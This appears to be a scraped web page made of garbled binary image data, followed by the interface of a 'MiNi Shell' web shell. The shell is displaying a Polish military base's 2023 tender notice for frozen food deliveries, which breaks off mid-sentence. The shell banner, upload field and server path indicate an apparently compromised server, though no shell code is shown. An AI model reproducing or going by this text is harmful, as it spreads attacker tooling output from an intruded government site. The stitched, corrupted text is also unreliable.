JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230210/0009012001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne dostawy produktów głęboko mrożonych, warzyw i owoców mrożonych w 2023 roku na rzecz 41. Bazy Lotnictwa Szkolnego w Dęblinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">41. Baza Lotnictwa Szkolnego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 061456920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brygady Pościgowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dęblin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-521</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">216517818</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">41blsz.przetargi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.41blsz.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne dostawy produktów głęboko mrożonych, warzyw i owoców mrożonych w 2023 roku na rzecz 41. Bazy Lotnictwa Szkolnego w Dęblinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f0031070-a861-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00090120</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00012131/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.7 Produkty głęboko mrożone</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/41blsz/module/lista_zadan <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002r. o świadczeniu usług drogą elektroniczną (tj. Dz. U. z 2020r, poz. 344) za<br/>pośrednictwem Platformy Zakupowej pod adresem: https://portal.smartpzp.pl/41blsz/module/lista_zadan.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) - określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>- posiadanie komputera o parametrach umożliwiających zainstalowanie następującego oprogramowania:<br/>• w zakresie podstawowych funkcjonalności – przegląd, pobieranie i załączanie dokumentów:<br/>a) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - Lub ich nowsze wersje<br/>b) przeglądarka internetowa Mozilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera w ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11,<br/>c) Lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox,Opera. Zalecane jest używanie najnowszych wersji przeglądarek<br/>• w zakresie składania podpisu kwalifikowanego (za pośrednictwem platformy SmartPZP):<br/>a) zainstalowane środowisko Java w wersji min. 1.8 (jre)<br/>b) w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web<br/>c) oprogramowania SzafirHost w systemie operacyjnym.<br/>Instrukcja instalowania oprogramowania wskazanego w punktach a, b i c powyżej znajduje się w Systemie w zakładce E-learning.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z usług Systemu (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla wszystkich użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców pod adresem https://portal.smartpzp.pl/41blsz/module/elearning.<br/>Maksymalny rozmiar pojedynczych plików przesyłanych za pośrednictwem Systemu wynosi 100 MB. Za pośrednictwem Systemu<br/>można przesłać wiele pojedynczych plików lub plik skompresowany do archiwum (ZIP) zawierający wiele pojedynczych plików.<br/>Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach .png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg<br/>Za datę przekazania i odbioru danych, w szczególności oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń<br/>oraz innych informacji przyjmuje się datę zapisania pliku na serwerze Systemu. Aktualna data i godzina, zsynchronizowane z<br/>Głównym Urzędem Miar, wyświetlane są w prawym górnym rogu Systemu.<br/>Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci elektronicznej (przykładowe formaty danych dla sporządzenia oferty: .doc, .docx, .rtf, .xps, .odt..) Przy czym zaleca się sporządzenie oferty w formacie danych: .pdf). Oferta musi być opatrzona kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.<br/>Szczegółowo informacje zawarte są w Rozdziale 11 i 14 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>3) Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia 2016/679, w celu umożliwienia korzystania ze<br/>środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie.<br/>4) W postępowaniu są przetwarzane dane osobowe podlegające ochronie zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz. U. z 2019 r. poz. 1781) oraz rozporządzenia 2016/679. Dane te mogą dotyczyć w szczególności samego wykonawcy (osoby fizycznej prowadzącej działalność gospodarczą), jego pełnomocnika (osoby fizycznej), jak też informacji o osobach, które w swojej ofercie wykonawca przedkłada celem wykazania spełniania warunków udziału w postępowaniu, braku podstaw do wykluczenia z postępowania, jak i potwierdzenia wymogów zamawiającego dotyczących wykonania przedmiotu zamówienia. 5) W postępowaniu i po zakończeniu postępowania do przetwarzania danych osobowych osób fizycznych stosuje się przepisy ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz. U. z 2019 r. poz. 1781) oraz rozporządzenia 2016/679.<br/>6) Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679, zamawiający informuje, że: administratorem Pani/Pana danych osobowych<br/>jest:<br/>41. Baza Lotnictwa Szkolnego w Dęblinie<br/>ul. Brygady Pościgowej 5<br/>08 – 521 Dęblin,<br/>NIP: 506-011-18-75, REGON: 061456920,<br/>kontakt: tel. 261 517 525, e-mail: 41blsz.przetargi@ron.mil.pl<br/>a) kontakt do Inspektora ochrony danych osobowych Zamawiającego: tel. 261 518 821, e-mail: 41blsz.iod@ron.mil.pl;<br/>b) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn.: „Sukcesywne dostawy produktów głęboko mrożonych, warzyw i owoców mrożonych w 2023 roku na rzecz 41. Bazy Lotnictwa Szkolnego w Dęblinie” Nr 10/23/P , prowadzonym w trybie podstawowym na podstawie art. 275 pkt. 1 ustawy Pzp.<br/>c) w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do<br/>art. 22 RODO;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy Pzp; Na podstawie art. 74 ust. 3 ustawy Pzp – w przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o<br/>udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2<br/>rozporządzenia 2016/679.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3<br/>RODO (związanych z prawem wykonawcy do uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego<br/>danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu), zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia.- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16 RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników.- W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO,nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.- W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679. Szczegółowy opis RODO w Rozdziale 23 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">10/23/P</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1 - sukcesywne dostawy produktów głęboko mrożonych;<br/><br/>Szczegółowy opis przedmiotu zamówienia został określony w SWZ oraz:<br/>• Załączniku Nr 1 do SWZ tj. Formularz ofertowy,<br/>• Załączniku Nr 1a do SWZ tj. Minimalne Wymagania Jakościowe dla Zadania 1,<br/>• Załączniku Nr 5a do SWZ tj. Projektowane postanowienia umowy – dla Zadania 1;<br/><br/>Przedmiotem zamówienie są sukcesywne dostawy produktów głęboko mrożonych w 2023 roku na rzecz 41. Bazy Lotnictwa<br/>Szkolnego w Dęblinie w ilościach podanych w tabeli poniżej:<br/>1. Flaki mrożone kg 1890<br/>2. Pierogi z mięsem mrożone kg 945<br/>3. Pierogi z kapustą i grzybami mrożone kg 237<br/>4. Pierogi z serem mrożone kg 710<br/>5. Pierogi ruskie mrożone kg 710<br/>6. Pierogi ze szpinakiem i serem feta mrożone kg 142<br/>7. Pierogi z owocami mrożone kg 237<br/>8. Uszka z kapustą i grzybami mrożone kg 95<br/>9. Paszteciki drożdżowe z mięsem mrożone kg 473<br/>10. Paszteciki drożdżowe z kapusta i grzybami mrożone kg 95<br/>11. Paszteciki drożdżowe z pieczarkami i serem mrożone kg 95<br/>12. Pyzy ziemniaczane z mięsem mrożone kg 473<br/>13. Pyzy ziemniaczane mrożone kg 237<br/>14. Krokiety z kapustą i grzybami mrożone kg 237<br/>15. Krokiety z mięsem mrożone kg 710<br/>16. Placki ziemniaczane mrożone kg 237<br/>17. Naleśniki z serem mrożone kg 710<br/>18. Naleśniki z owocami mrożone kg 710<br/>19. Kluski śląskie mrożone kg 710<br/>20. Kopytka mrożone kg 710<br/>21. Knedle owocowe mrożone kg 710<br/>22. Spód do pizzy mrożony kg 237<br/>23. Frytki mrożone kg 119<br/><br/>Wykonawca zobowiązuje się dostarczyć towary w ilościach i rodzajach zgodnych z formularzem ofertowym, stanowiącym<br/>załącznik nr 1 do SWZ oraz w jakości spełniającej wszystkie wymagania określone w „Minimalnych wymaganiach<br/>jakościowych”, zawierających szczegółowe opisy przedmiotu zamówienia, stanowiących załącznik nr 1a i 1b do SWZ oraz<br/>projektowanych postanowieniach umowy (załącznik nr 5a i 5b do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15896000-5 - Produkty głęboko mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zgodnie z art. 441 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje, a Wykonawca wyraża zgodę na<br/>skorzystanie z prawa opcji. Prawem opcji objęte jest świadczenie sukcesywnych dostaw wyszczególnionych w<br/>poszczególnych pozycjach asortymentowych wskazanych powyżej w tabeli Nr 1/2 w kolumnie 5 (w zależności od<br/>zadania/części zamówienia w zakresie którego ma być realizowane zamówienie) oraz załączniku nr 1 do SWZ – formularzu<br/>ofertowym.<br/>Zamawiający przewiduje możliwość skorzystania z prawa opcji określonego w art. 441 ustawy Pzp (prawo opcji) dla<br/>poszczególnych pozycji asortymentowych maksymalnie do ilości asortymentu ujętego w tabeli nr 1/2 (kolumnach nr 5 „Ilości<br/>stanowiące zamówienie w ramach prawa opcji”) oraz w formularzu ofertowym – załączniku nr 1 do SWZ.<br/>Zamawiający w przypadku skorzystania z prawa opcji nie jest zobowiązany w jej ramach do zamawiania każdego<br/>asortymentu składającego się na przedmiot zamówienia (każdej pozycji asortymentowej ujętej w tabeli nr 1/2). Przedmiot<br/>zamówienia każdorazowo będzie określony bieżącymi potrzebami Zamawiającego, które są w pełni uzależnione od<br/>zmiennej ilości stanów żywionych, planowanych lub nieplanowanych potrzeb oraz przedsięwzięć, uzyskanie dodatkowych<br/>środków finansowych na uruchomienie prawa opcji.<br/>Prawo opcji zostanie uruchomione po wyczerpaniu ilości z zamówienia podstawowego w danej pozycji asortymentowej.<br/>Zamawiający zastrzega, iż część zamówienia określona jako „prawo opcji” jest uprawnieniem, a nie zobowiązaniem<br/>Zamawiającego. Zamawiający może nie skorzystać z prawa opcji w szczególności w przypadku nieuzyskania środków<br/>finansowych na ten cel, a Wykonawcy nie przysługują z tego tytułu żadne roszczenia.<br/>Zamówienie podstawowe w ilościach określonych w tabeli nr 1/2 (kolumna 4) jest zamówieniem gwarantowanym Zamówienie objęte prawem opcji będzie realizowane na zasadach określonych w projektowanych postanowieniach umowy<br/>(Załącznik Nr 5a/5b), stosując odpowiednio postanowienia jak dla zamówienia podstawowego (gwarantowanego). <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym<br/>kryteriami i ich znaczeniem (wagą):<br/>X - cena brutto oferty – waga 100%<br/>X = (Cn : Cb) x 100 x 100% ( ilość punktów )<br/>gdzie<br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert<br/>Cb – cena brutto oferty ocenianej<br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto (wartość zamówienia podstawowego+wartość zamówienia w<br/>ramach opcji) - z formularza ofertowego stanowiącego załącznik Nr 1 do<br/>SWZ . Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu<br/>o cenach towarów i usług (Dz. U. z 2019 r. poz. 178). Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą.<br/>Maksymalna liczba punktów, jaką Wykonawca może uzyskać w kryterium „cena brutto oferty” wynosi 100 punktów.<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie wskazanego<br/>powyżej kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2 - sukcesywne dostawy warzyw i owoców mrożonych.<br/><br/>Szczegółowy opis przedmiotu zamówienia został określony niniejszej SWZ oraz:<br/>• Załączniku Nr 1 do SWZ tj. Formularz ofertowy,<br/>• Załączniku Nr 1b do SWZ tj. Minimalne Wymagania Jakościowe dla Zadania 2;<br/>• Załączniku Nr 5b do SWZ tj. Projektowane postanowienia umowy – dla Zadania 2<br/><br/>Przedmiotem zamówienie są sukcesywne dostawy warzyw i owoców mrożonych w 2023 roku na rzecz 41. Bazy Lotnictwa<br/>Szkolnego w Dęblinie w ilościach podanych poniżej:<br/>1. Mieszanka warzywna II składnikowa mrożona kg 1420<br/>2. Kapusta brukselka mrożona kg 378<br/>3. Fasolka szparagowa mrożona kg 710<br/>4. Różyczki kalafiora mrożone kg 1182<br/>5. Brokuł mrożony kg 945<br/>6. Szpinak mrożony kg 95<br/>7. Marchewka mini mrożona kg 95<br/>8. Dynia mrożona kg 95<br/>9. Truskawka mrożona kg 237<br/>10. Sałatka owocowa mrożona kg 190<br/>11. Czarna porzeczka mrożona kg 237<br/>12. Śliwka mrożona kg 237<br/>13. Wiśnie mrożone kg 95<br/>14. Maliny mrożone kg 95<br/>15. Włoszczyzna mrożona kg 473<br/><br/>Wykonawca zobowiązuje się dostarczyć towary w ilościach i rodzajach zgodnych z formularzem ofertowym, stanowiącym<br/>załącznik nr 1 do SWZ oraz w jakości spełniającej wszystkie wymagania określone w „Minimalnych wymaganiach<br/>jakościowych”, zawierających szczegółowe opisy przedmiotu zamówienia, stanowiących załącznik nr 1a i 1b do SWZ oraz<br/>projektowanych 